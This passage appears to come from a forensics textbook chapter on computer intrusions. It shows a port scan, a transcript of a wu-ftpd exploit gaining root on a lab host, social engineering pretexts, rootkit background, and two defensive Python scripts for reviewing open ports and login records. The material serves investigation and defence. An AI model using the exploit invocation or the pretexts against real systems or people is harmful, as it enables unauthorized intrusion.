The most straightforward way to break into a computer is to steal or guess a password. However, if this is not a viable option, an intruder can usually gather enough information about a system to gain access to it. The most basic way to gather information about a system is to use a port scanner as shown here:
```
% probe_tcp_ports 192.168.52.2
Host 192.168.52.2, Port 7 ("echo" service) connection ... open.
Host 192.168.52.2, Port 9 ("discard" service) connection ... open.
Host 192.168.52.2, Port 13 ("daytime" service) connection ... open.
Host 192.168.52.2, Port 19 ("chargen" service) connection ... open.
Host 192.168.52.2, Port 21 ("ftp" service) connection ... open.
Host 192.168.52.2, Port 23 ("telnet" service) connection ... open.
Host 192.168.52.2, Port 25 ("smtp" service) connection ... open.
Host 192.168.52.2, Port 53 ("domain" service) connection ... open.
Host 192.168.52.2, Port 69 connection ... open.
Host 192.168.52.2, Port 79 ("finger" service) connection ... open.
Host 199.168.52.2, Port 110 ("pop" service) connection ... open.
```
This basic TCP port scanner shows that, in addition to running an e-mail server on port 25, this computer has a number of other servers, including an FTP server on port 21 for people to transfer files to and from the computer, a finger server on port 79 that can give out information about individuals with accounts on the machine, and a POP server on port 110 for users to check their e-mail remotely. The operating system and server versions can often be inferred from this type of port scan, or by using a more advanced port scanner like nmap. Knowing the operating system and the services running on a computer is often all that an intruder requires, because certain services on certain operating systems are known to be vulnerable. For instance, the following shows an exploit that is freely available on the Internet being used to gain unauthorized access to an FTP server:
```
% wuftpd-exploit -t 192.168.7.25 -s 0
Target: 192.168.7.25 (ftp/<shellcode>): RedHat 6.2 with wuftpd 2.6.0(1)
Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152
loggin into system..
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS <shellcode>
230-Next time please use your e-mail address as your password
230 Guest login ok, access restrictions apply.
STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04]
STEP 3 : Checking if we can reach our return address by format string
STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now)
STEP 5 : Sending code.. this will take about 10 seconds.
Press ^\ to leave shell
Linux ftp-server.corpX.com 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
w
 8:54am up 3 days, 12:21, 0 users, load average: 0.12, 0.09, 0.03
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
last
ftp      ftpd7718     intruder.isp.com  Wed Sep 20 08:52   still logged in
ftp      ftpd7291     helpsrv.smut.com  Tue Sep 19 15:13   still logged in
reboot   system boot  2.2.14-5.0        Sat Sep 16 20:33   (3+12:21)
ftp      ftpd1120     203.235.121.105   Sun Sep 10 04:08 - down   (1+21:32)
ftp      ftpd833      mail2.txinc.com   Sat Sep  9 21:39 - down   (2+04:02)
reboot   system boot  2.2.14-5.0        Sat Sep  9 12:21   (2+13:20)

wtmp begins Thu Sep  7 17:59:03 2000
```
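The defender's counterpart of the port scan shown earlier is to compare what the scanner reports against the services the host is actually supposed to offer. The following is an added example, not code from the book: it parses the probe_tcp_ports output format quoted above and, given an approved port list (assumed here to be SMTP and POP for a mail server), lists every unexpected open port with the reason it matters, plus any open port the scanner could not name. The concern notes are assumed policy text, not from the book.

```python
import re

# Constructed copy of the probe_tcp_ports output quoted above, one result per line.
SAMPLE_SCAN = """\
Host 192.168.52.2, Port 7 ("echo" service) connection ... open.
Host 192.168.52.2, Port 9 ("discard" service) connection ... open.
Host 192.168.52.2, Port 13 ("daytime" service) connection ... open.
Host 192.168.52.2, Port 19 ("chargen" service) connection ... open.
Host 192.168.52.2, Port 21 ("ftp" service) connection ... open.
Host 192.168.52.2, Port 23 ("telnet" service) connection ... open.
Host 192.168.52.2, Port 25 ("smtp" service) connection ... open.
Host 192.168.52.2, Port 53 ("domain" service) connection ... open.
Host 192.168.52.2, Port 69 connection ... open.
Host 192.168.52.2, Port 79 ("finger" service) connection ... open.
Host 192.168.52.2, Port 110 ("pop" service) connection ... open.
"""
LINE = re.compile(r'^Host (?P<host>[\d.]+), Port (?P<port>\d+)'
                  r'(?: \("(?P<svc>[^"]+)" service\))? connection \.\.\. (?P<state>\w+)\.$')
# Why each service seen above matters to a defender (assumed policy notes, not from the book).
CONCERNS = {
    7: "echo: legacy inetd test service, no business use",
    9: "discard: legacy inetd test service, no business use",
    13: "daytime: legacy inetd test service, discloses local time",
    19: "chargen: legacy inetd service, usable for traffic amplification",
    21: "ftp: cleartext credentials; check daemon version and anonymous access",
    23: "telnet: cleartext logins; replace with SSH",
    79: "finger: enumerates account names and login activity",
    110: "pop: cleartext passwords unless wrapped in TLS",
}

def parse_scan(text):
    """Yield (host, port, service-or-None) for every line reporting an open port."""
    for line in text.splitlines():
        m = LINE.match(line)
        if m and m["state"] == "open":
            yield m["host"], int(m["port"]), m["svc"]

def review_exposure(text, expected_ports):
    """Compare the scan against the ports the host is supposed to serve.
    Returns per-host findings: unexpected open ports with the concern attached,
    and open ports the scanner could not even name (identify those first)."""
    findings = {}
    for host, port, svc in parse_scan(text):
        report = findings.setdefault(host, {"unexpected": [], "unnamed": []})
        if svc is None:
            report["unnamed"].append(port)
        if port not in expected_ports:
            note = CONCERNS.get(port, f"{svc or 'unknown'}: not in the approved service list")
            report["unexpected"].append((port, note))
    return findings
```

Run against the sample with `review_exposure(SAMPLE_SCAN, {25, 110})`; nine of the eleven open ports come back as unexpected, and port 69 is additionally flagged as unnamed.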
When intruders cannot access a system through known security holes, they use less technical methods to gain access. Intruders sometimes even dig through garbage for useful information. Intruders also try to get information using social engineering and reverse social engineering. Social engineering refers to any attempt to contact legitimate users of the target system and trick them into giving out information that can be used by the intruder to break into the system. For example, calling someone and pretending to be a new employee who is having trouble getting started can result in useful information like computer names, operating systems, and even some information about employee accounts. Alternatively, pretending to be a computer technician who is trying to fix a problem can also lead to useful information. There are many different ways to do this, including calling people claiming to be looking into a problem or going into the organization to look around. Some people will even make the mistake of giving out their passwords.
Reverse social engineering is any attempt to have someone in the target organization contact the intruder for assistance, rather than the other way around. For example, circulating a memo with a "new" technical support e-mail address can result in a flood of information. The advantage of reverse social engineering is that people who sought help from the intruder, and had their problem resolved, have little reason to be suspicious or to report the incident to anyone.
Table 19.1 summarizes the various methods of approach/attack. The categories are not mutually exclusive; intruders may employ several of these attack vectors to achieve their goals.

| ATTACK VECTOR NAME | DESCRIPTION |
|---|---|
Authentication bypass | Gaining access while avoiding standard authentication |
Authentication failure | Taking advantage of authentication systems which "fail open" |
Buffer overflows | Exploiting stack memory overwriting in networked server programs |
Password cracking | Brute-force, reverse-engineering, and "dictionary" based methods used to discover account passwords |
Password sniffing | Capturing account passwords via a network "tap" |
Session hijacking | Piggybacking on authorized user connections from the Internet into internal hosts and networks |
Social engineering | Impersonation of authorized personnel to gain access or network passwords |
Spoofing | Having a computer masquerade as a different "trusted" computer to gain access |
Trojan horses | Malicious programs such as BackOrifice can provide "back doors" (unauthorized avenues for access) into hosts from the Internet |
Many of the attack methods in Table 19.1 were discussed in earlier chapters such as buffer overflows in Chapter 15, session hijacking in Chapter 16, and IP spoofing in Chapter 17.
After intruders gain access to a computer, they may be able to compromise the administrator account (known as "root" on UNIX systems), thus gaining unrestricted access to the entire system. In fact, certain security holes allow computer intruders to break into a computer and get root access in one step. With unlimited access to the system, it is possible for an offender to modify any information on the computer, thus removing traces of an intrusion. Intruders may change the system clock, delete log files, and replace system components. There are specific computer programs, called rootkits, which automate the process of hiding a break-in, enabling a low-skilled offender to exhibit higher-skilled behavior. For example, the Rootkit[2] project is developing such a program for Windows machines. More sophisticated rootkits such as Knark, Sebek, and Suckit on Linux are emerging, making intrusion investigations even more challenging. Increasingly, criminals are using strong encryption on UNIX systems, such as encrypted RAM disks, Blowfish encryption in IRC eggdrop bots, and encrypted executables using Teso Burneye (Phrack 58, 2001), and are using other "anti-forensic" tools to make digital evidence examinations more difficult (Phrack 59, 2002).
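Before an intruder with root access gets around to cleaning the logs, the login records are often the first place an investigator looks; the exploit transcript above shows the intruder's own session sitting at the top of the `last` output. The following is an added example, not code from the book: it parses `last`-style output (a constructed sample modelled on the transcript), lists sessions still open and logins from outside an assumed internal domain, and flags records that break the newest-first order, which is what a changed system clock or a hand-edited wtmp file tends to leave behind.

```python
import re
from datetime import datetime

# Constructed sample in the column layout `last` prints, modelled on the
# transcript above (the intruder's own session is the newest record).
SAMPLE_LAST = """\
ftp      ftpd7718     intruder.isp.com  Wed Sep 20 08:52   still logged in
ftp      ftpd7291     helpsrv.smut.com  Tue Sep 19 15:13   still logged in
reboot   system boot  2.2.14-5.0        Sat Sep 16 20:33   (3+12:21)
ftp      ftpd1120     203.235.121.105   Sun Sep 10 04:08 - down   (1+21:32)
ftp      ftpd833      mail2.txinc.com   Sat Sep  9 21:39 - down   (2+04:02)
reboot   system boot  2.2.14-5.0        Sat Sep  9 12:21   (2+13:20)

wtmp begins Thu Sep  7 17:59:03 2000
"""
RECORD = re.compile(r"^(?P<user>\S+)\s+(?P<tty>system boot|\S+)\s+(?P<src>\S+)\s+"
                    r"(?P<when>\w{3} \w{3}\s+\d{1,2} \d\d:\d\d)\s+(?P<rest>.*)$")
BEGINS = re.compile(r"^wtmp begins (?P<when>.+)$")

def parse_last(text):
    """Return (records newest-first, wtmp start time). The year is taken from
    the 'wtmp begins' line because `last` prints none on session records."""
    lines = text.splitlines()
    begins = next(m for line in lines if (m := BEGINS.match(line)))
    start = datetime.strptime(begins["when"].strip(), "%a %b %d %H:%M:%S %Y")
    records = []
    for line in lines:
        m = RECORD.match(line)
        if m:
            when = datetime.strptime(f"{m['when']} {start.year}", "%a %b %d %H:%M %Y")
            records.append({**m.groupdict(), "when": when})
    return records, start

def review_logins(text, internal_suffix):
    """Three first-pass checks: sessions still open, logins from outside the
    organisation (internal_suffix is an assumed domain), and records out of
    newest-first order, the trace left by a changed clock or an edited wtmp."""
    records, _ = parse_last(text)
    live = [r["src"] for r in records if r["rest"].startswith("still logged in")]
    external = [r["src"] for r in records
                if r["user"] != "reboot" and not r["src"].endswith(internal_suffix)]
    anomalies = [f"{cur['src']} dated after {prev['src']}"
                 for prev, cur in zip(records, records[1:]) if cur["when"] > prev["when"]]
    return {"live": live, "external": external, "anomalies": anomalies}
```

On the clean sample, `review_logins(SAMPLE_LAST, ".corpX.com")` reports two live sessions and no ordering anomalies; moving one record's date forward, as a reset clock would, produces an anomaly entry.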
Once an intruder has gained access to one computer on a network, it may be possible to gather additional information about a network and obtain passwords to other systems using a sniffer.
[2]http://www.rootkit.com